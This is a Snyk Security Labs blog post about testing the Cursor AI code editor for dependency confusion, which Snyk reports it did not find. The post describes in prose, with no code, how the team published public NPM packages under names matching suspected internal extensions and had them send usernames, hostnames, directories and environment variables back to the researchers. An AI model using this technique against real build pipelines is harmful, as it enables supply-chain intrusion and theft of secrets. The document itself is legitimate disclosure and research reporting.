Skip to main content

Snyk Security Labs Testing Update: Cursor.com AI Code Editor

Written by:
Danny Allan

Danny Allan

January 14, 2025

0 mins read

Snyk’s Security Labs team aims to find and help mitigate vulnerabilities in software used by developers around the world, with an overarching goal to improve the state of software security. We do this by targeting tools developers are using, including new and popular software solutions. With the meteoric rise in AI tooling – specifically the fast-growing field of AI-enabled development environments – we have been including such software in our research cycles.

One such piece of software is Cursor’s AI Code Editor, a competitor of VSCode and other popular developer IDEs. This software integrates AI code assistance into the developer experience. With research like this, our hope is that we identify no vulnerabilities, but if we do, this allows us an opportunity to responsibly disclose them to ensure that all developers using this software are safer. Cursor publicly encourages reporting security vulnerabilities in their product and have published a guide and an established channel for such reports.

As part of their research, the Snyk Security Labs Research team determined that there are multiple private extensions bundled with the software. VSCode (upon which the Cursor AI Code Editor is based) extensions are created just like classic Nodejs dependencies, described using package.json files. Our idea for a potential attack vector was that Cursor internally treated the VSCode extensions as NPM packages, and during builds they were pulled from an internal repository. If that had been the case (we now know it is not) and the build system was misconfigured, there could be a threat of a dependency confusion attack. While we figured this setup was unlikely, it was a worthwhile research avenue because in the event this was the case, it could have had a considerable impact on both Cursor’s systems and their users.

To test this theory, we uploaded packages to the public NPM repository with names matching those we suspected to be part of the Cursor AI Code Editor’s build. This is a common technique for testing for dependency confusion. It is extremely unlikely that these packages would have been installed by developers or systems other than those being tested at Cursor – in fact, it was unlikely they would ever be installed at all. Still, in their descriptions we marked all of the packages as testing packages originating from Snyk’s Security Labs team, included a direct email address to contact the author and set a narrow time window in which the packages would be available (24 hours). The source code of these packages was very small and made no attempts to obfuscate its behavior. The packages performed HTTP requests back to our researchers containing username, hostname, current directory and (in later versions) environmental variables. The outbound request communications were necessary to determine if there was a fully “blind” installation. In the later version, Snyk’s researchers added additional fields for the data received to mitigate false positives caused by automated scanners downloading and executing the packages which were outside the scope of the proof of concept. In order for Snyk to submit reliable and accurate reports to the Cursor security team we needed to be able to confirm the installs were executed by Cursor and that what we had identified was a legitimate dependency confusion issue.  

In the end, Snyk Security Labs found no indications that Cursor was in any way vulnerable to dependency confusion. Additionally, no sensitive data was disclosed to us during our testing. These types of attack vectors – low complexity and low likelihood, but high impact – are an important research subject, as the low barrier to entry may make this attack relatively easy for malicious actors to execute. Snyk Security Labs regularly conducts vulnerability research and strives to uphold the highest testing standards in the interest of improving developer security. 

By testing for these vulnerabilities, Snyk’s Security Labs hopes to beat attackers to the punch and ensure that the software and systems developers around the world are using every day are safe.

Developer loved. Security trusted.

Snyk's dev-first tooling provides integrated and automated security that meets your governance and compliance needs.

Best practices for AI in the SDLC

Download this cheat sheet today to learn best practices for how to leverage AI in your SDLC, securely.